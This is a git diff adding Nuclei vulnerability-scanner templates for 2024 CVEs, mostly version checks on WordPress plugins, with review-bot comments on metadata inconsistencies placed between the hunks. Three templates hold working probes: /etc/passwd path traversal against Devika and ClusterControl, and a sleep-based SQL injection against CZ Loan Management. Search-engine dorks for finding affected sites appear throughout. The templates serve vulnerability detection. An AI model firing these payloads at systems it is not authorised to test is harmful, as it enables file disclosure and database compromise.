+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/11dbc647-fa96-4c63-8f13-0c8ea6f33919?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-39659
+ metadata:
+ fofa-query: "wp-content/plugins/wp-postratings/"
+ google-query: inurl:"/wp-content/plugins/wp-postratings/"
+ shodan-query: 'vuln:CVE-2024-39659'
+ tags: cve,wordpress,wp-plugin,wp-postratings,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-postratings/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-postratings"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.91.1')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39660.yaml b/nuclei-templates/CVE-2024/CVE-2024-39660.yaml
new file mode 100644
index 0000000000..bce20e4b05
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39660.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39660
+
+info:
+ name: >
+ Photo Engine <= 6.3.1 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Photo Engine plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/00a7768f-5fd6-49ff-bcd6-e44dd59ae8d9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-39660
+ metadata:
+ fofa-query: "wp-content/plugins/wplr-sync/"
+ google-query: inurl:"/wp-content/plugins/wplr-sync/"
+ shodan-query: 'vuln:CVE-2024-39660'
+ tags: cve,wordpress,wp-plugin,wplr-sync,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wplr-sync/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wplr-sync"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.3.1')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39661.yaml b/nuclei-templates/CVE-2024/CVE-2024-39661.yaml
new file mode 100644
index 0000000000..e4ab02e7af
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39661.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39661
+
+info:
+ name: >
+ Kubio AI Page Builder <= 2.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Kubio AI Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Heading Block in versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6adf6f3b-aff0-4495-92a4-13855dac5030?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-39661
+ metadata:
+ fofa-query: "wp-content/plugins/kubio/"
+ google-query: inurl:"/wp-content/plugins/kubio/"
+ shodan-query: 'vuln:CVE-2024-39661'
+ tags: cve,wordpress,wp-plugin,kubio,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kubio/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kubio"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.4')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39663.yaml b/nuclei-templates/CVE-2024/CVE-2024-39663.yaml
new file mode 100644
index 0000000000..71f69fbe43
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39663.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39663
+
+info:
+ name: >
+ WP Fast Total Search <= 1.68.232 - Unauthenticated Stored Cross-Site Scripting
+ author: topscoder
+ severity: high
+ description: >
+ The WP Fast Total Search – The Power of Indexed Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.68.232 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12fe64ad-2998-4f41-b8d7-aa5921b0d0d9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cve-id: CVE-2024-39663
+ metadata:
+ fofa-query: "wp-content/plugins/fulltext-search/"
+ google-query: inurl:"/wp-content/plugins/fulltext-search/"
+ shodan-query: 'vuln:CVE-2024-39663'
+ tags: cve,wordpress,wp-plugin,fulltext-search,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fulltext-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fulltext-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.68.232')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39664.yaml b/nuclei-templates/CVE-2024/CVE-2024-39664.yaml
new file mode 100644
index 0000000000..e6240ba94f
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39664.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39664
+
+info:
+ name: >
+ Filter & Grids <= 2.8.33 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The Filter & Grids plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.33. This is due to missing or incorrect nonce validation on the ymc_updated_posts function. This makes it possible for unauthenticated attackers to trigger a request to fetch updated posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac799e11-2f7b-43c2-88da-e77c075a958f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-39664
+ metadata:
+ fofa-query: "wp-content/plugins/ymc-smart-filter/"
+ google-query: inurl:"/wp-content/plugins/ymc-smart-filter/"
+ shodan-query: 'vuln:CVE-2024-39664'
+ tags: cve,wordpress,wp-plugin,ymc-smart-filter,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ymc-smart-filter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ymc-smart-filter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.33')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39665.yaml b/nuclei-templates/CVE-2024/CVE-2024-39665.yaml
new file mode 100644
index 0000000000..9a7a67db3e
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39665.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39665
+
+info:
+ name: >
+ Filter & Grids <= 2.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Filter & Grids plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c59195f5-bb77-4f96-bd5e-b871d663ccce?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-39665
+ metadata:
+ fofa-query: "wp-content/plugins/ymc-smart-filter/"
+ google-query: inurl:"/wp-content/plugins/ymc-smart-filter/"
+ shodan-query: 'vuln:CVE-2024-39665'
+ tags: cve,wordpress,wp-plugin,ymc-smart-filter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ymc-smart-filter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ymc-smart-filter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.2')
\ No newline at end of file
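Review bot: `severity: low` disagrees with the `cvss-score: 6.4` declared in the same `info` block, which sits in the CVSS medium band, so a scan filtered by severity will rank or drop this finding differently from what the score implies. The same mismatch appears in the templates for CVE-2024-39668, -5226 and -5668 (6.4), -6824 and -6987 (4.3), -6869 (5.4) and most visibly -7150, an SQL injection scored 8.8 and labelled `low`. If the downgrade is deliberate because the issues need an authenticated account, record that in a comment next to `severity`. Otherwise set `severity: medium` here and `severity: high` in CVE-2024-7150, and change the trailing severity word in `tags` to match.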
diff --git a/nuclei-templates/CVE-2024/CVE-2024-39668.yaml b/nuclei-templates/CVE-2024/CVE-2024-39668.yaml
new file mode 100644
index 0000000000..8023b54926
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-39668.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39668
+
+info:
+ name: >
+ Extensions for Elementor <= 2.0.31 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5bea454e-bd1a-4cdf-acec-7bf15f6a6cda?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-39668
+ metadata:
+ fofa-query: "wp-content/plugins/extensions-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/extensions-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-39668'
+ tags: cve,wordpress,wp-plugin,extensions-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/extensions-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "extensions-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.31')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-40422.yaml b/nuclei-templates/CVE-2024/CVE-2024-40422.yaml
new file mode 100644
index 0000000000..450fad8d83
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-40422.yaml
@@ -0,0 +1,66 @@
+id: CVE-2024-40422
+
+info:
+ name: Devika v1 - Path Traversal
+ author: securityforeveryone,alpernae
+ severity: critical
+ description: |
+ The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
+ - https://cvefeed.io/vuln/detail/CVE-2024-40422
+ - https://github.com/alpernae/CVE-2024-40422
+ - https://github.com/stitionai/devika
+ - https://www.exploit-db.com/exploits/52066
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.1
+ cve-id: CVE-2024-40422
+ cwe-id: CWE-22
+ epss-score: 0.0087
+ epss-percentile: 0.82513
+ cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: stitionai
+ product: devika
+ fofa-query: icon_hash="-1429839495"
+ tags: cve,cve2024,devika,lfi
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET /api/data HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
+ - 'contains(content_type,"application/json")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+
+ - type: word
+ part: header
+ words:
+ - 'application/octet-stream'
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2024/CVE-2024-41628.yaml b/nuclei-templates/CVE-2024/CVE-2024-41628.yaml
new file mode 100644
index 0000000000..9ad8bc555a
--- /dev/null
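Review bot: `max-request: 1` under `metadata` undercounts what the template sends: there are two `raw` requests, chained by `flow: http(1) && http(2)`. It should read `max-request: 2`, as the CVE-2024-41628 template in this commit declares for the same two-step layout, so that request budgeting and rate planning based on the metadata stay accurate. The file also ends without the `# digest:` line that the CVE-2024-41628, CVE-2024-5975 and CVE-2024-7008 templates carry, which may mean it was added unsigned; worth confirming.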
+++ b/nuclei-templates/CVE-2024/CVE-2024-41628.yaml
@@ -0,0 +1,61 @@
+id: CVE-2024-41628
+
+info:
+ name: Cluster Control CMON API - Directory Traversal
+ author: securityforeveryone
+ severity: high
+ description: |
+ Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API.
+ reference:
+ - https://cvefeed.io/vuln/detail/CVE-2024-41628
+ - https://github.com/Redshift-CyberSecurity/CVE-2024-41628
+ - https://vuldb.com/?id.272533
+ - https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-41628
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-41628
+ cwe-id: CWE-22
+ epss-score: 0.00045
+ epss-percentile: 0.1555
+ cpe: cpe:2.3:a:severalnines:clustercontrol:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: severalnines
+ product: cluster_control
+ fofa-query: icon_hash="160707013" || icon_hash="-1815707560"
+ tags: cve,cve2024,severalnines,cluster-control,lfi
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body,"ClusterControl","CMON_API")'
+ - 'contains(content_type,"text/html")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ GET /../../../../../../../../..//etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a0047304502210087c3932b04bdbe006b7eefff8966f21f6dd854e5b2b9f0b403af9ca2ad1b8452022014abfe4d46c5fc7dccb7d0602242a09add132dcad91f5c4cdb8a18fcc5eb6e73:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
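Review bot: The product is named three different ways in the `info` block: the `cpe` uses `clustercontrol`, `metadata` has `product: cluster_control`, and `tags` uses `cluster-control`. Anything that correlates findings to an asset inventory through the CPE product name will not join on the metadata value. Assuming the CPE string is the authoritative one, I would change the metadata line to `product: clustercontrol`. The `cpe` also leaves the version as `*` although the description lists the fixed builds, so the block by itself does not say which versions are affected.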
diff --git a/nuclei-templates/CVE-2024/CVE-2024-5057.yaml b/nuclei-templates/CVE-2024/CVE-2024-5057.yaml
new file mode 100644
index 0000000000..c509bd713b
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-5057.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5057
+
+info:
+ name: >
+ Easy Digital Downloads <= 3.2.12 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Easy Digital Downloads plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.2.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/20fdbe6b-45a8-41f4-8dde-35a0f9ea04a1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-5057
+ metadata:
+ fofa-query: "wp-content/plugins/easy-digital-downloads/"
+ google-query: inurl:"/wp-content/plugins/easy-digital-downloads/"
+ shodan-query: 'vuln:CVE-2024-5057'
+ tags: cve,wordpress,wp-plugin,easy-digital-downloads,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/easy-digital-downloads/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "easy-digital-downloads"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.12')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-5226.yaml b/nuclei-templates/CVE-2024/CVE-2024-5226.yaml
new file mode 100644
index 0000000000..e6bce7a0ac
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-5226.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5226
+
+info:
+ name: >
+ Fuse Social Floating Sidebar <= 5.4.10 - Authenticated (Author+) Stored Cross-Site Scripting via File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Fuse Social Floating Sidebar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the file upload functionality in all versions up to, and including, 5.4.10 due to insufficient validation of SVG files. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a3137a1-8e46-44c6-8edd-ad9fc4d66e0b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5226
+ metadata:
+ fofa-query: "wp-content/plugins/fuse-social-floating-sidebar/"
+ google-query: inurl:"/wp-content/plugins/fuse-social-floating-sidebar/"
+ shodan-query: 'vuln:CVE-2024-5226'
+ tags: cve,wordpress,wp-plugin,fuse-social-floating-sidebar,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fuse-social-floating-sidebar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fuse-social-floating-sidebar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.4.10')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-5668.yaml b/nuclei-templates/CVE-2024/CVE-2024-5668.yaml
new file mode 100644
index 0000000000..e0e452d2d7
--- /dev/null
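Review bot: The `name` field says `Authenticated (Author+)` while the `description` says "contributor-level access and above", so the template gives two different minimum roles for the same issue. The required role decides who on a site is a realistic source of the upload, so whoever triages the finding needs one answer. The hunk alone does not show which is right; the Wordfence entry listed under `reference` should settle it, and both fields should then name the same role.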
+++ b/nuclei-templates/CVE-2024/CVE-2024-5668.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5668
+
+info:
+ name: >
+ Lightbox & Modal Popup WordPress Plugin – FooBox <= 2.7.28 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via HTML Data Attributes
+ author: topscoder
+ severity: low
+ description: >
+ The Lightbox & Modal Popup WordPress Plugin – FooBox plugin for WordPress is vulnerable to DOM-based Stored Cross-Site Scripting via HTML data attributes in all versions up to, and including, 2.7.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/923f9e66-2e26-4ec2-a4b3-439881a6ca10?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5668
+ metadata:
+ fofa-query: "wp-content/plugins/foobox-image-lightbox/"
+ google-query: inurl:"/wp-content/plugins/foobox-image-lightbox/"
+ shodan-query: 'vuln:CVE-2024-5668'
+ tags: cve,wordpress,wp-plugin,foobox-image-lightbox,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/foobox-image-lightbox/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "foobox-image-lightbox"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.28')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-5975.yaml b/nuclei-templates/CVE-2024/CVE-2024-5975.yaml
new file mode 100644
index 0000000000..4d7aacf0be
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-5975.yaml
@@ -0,0 +1,58 @@
+id: CVE-2024-5975
+
+info:
+ name: CZ Loan Management <= 1.1 - SQL Injection
+ author: securityforeveryone
+ severity: critical
+ description: |
+ The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-5975
+ - https://wpscan.com/vulnerability/68f81943-b007-49c8-be9c-d0405b2ba4cf/
+ - https://vuldb.com/?id.272929
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.1
+ cve-id: CVE-2024-5975
+ epss-score: 0.00043
+ epss-percentile: 0.09404
+ metadata:
+ vendor: team-contriverz
+ product: cz-loan-management
+ framework: wordpress
+ publicwww-query: "/wp-content/plugins/cz-loan-management"
+ tags: cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body,"CZ Loan Management")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ @timeout 20s
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ action=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'contains(content_type,"text/html")'
+ - 'status_code == 200'
+ condition: and
+# digest: 4a0a0047304502202cfedabc9957a35e0f37506cfa810e4dbf5d0c596ccde8d1662208e92c9c8343022100e076ba5a516edf8daec029f0117b83110e86aeaa398e3849f5d52fba17d1f0d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6254.yaml b/nuclei-templates/CVE-2024/CVE-2024-6254.yaml
new file mode 100644
index 0000000000..3c26ec7fc5
--- /dev/null
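Review bot: The second request's verdict rests on a single timing sample: `duration>=6` together with a 200 `text/html` response. Any `admin-ajax.php` that takes six seconds for unrelated reasons (a loaded host, a slow upstream, a WAF tarpit) satisfies the same three conditions, so a match here is a candidate rather than a confirmation. I would record that in the template with `# time-based check: a slow backend also satisfies duration>=6; re-test before reporting`. The `metadata` block also omits the request count that the other two-request templates in this commit declare; adding `max-request: 2` would align it.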
+++ b/nuclei-templates/CVE-2024/CVE-2024-6254.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6254
+
+info:
+ name: >
+ Brizy – Page Builder <= 2.5.1 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The Brizy – Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on form submissions. This makes it possible for unauthenticated attackers to submit forms intended for public use as another user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. On sites where unfiltered_html is enabled, this can lead to the admin unknowingly adding a Stored Cross-Site Scripting payload.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/75ec04f1-8bea-4514-b1d0-da5b305219d7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-6254
+ metadata:
+ fofa-query: "wp-content/plugins/brizy/"
+ google-query: inurl:"/wp-content/plugins/brizy/"
+ shodan-query: 'vuln:CVE-2024-6254'
+ tags: cve,wordpress,wp-plugin,brizy,medium
+
+http:
+ - method: GET
+ redirects: true
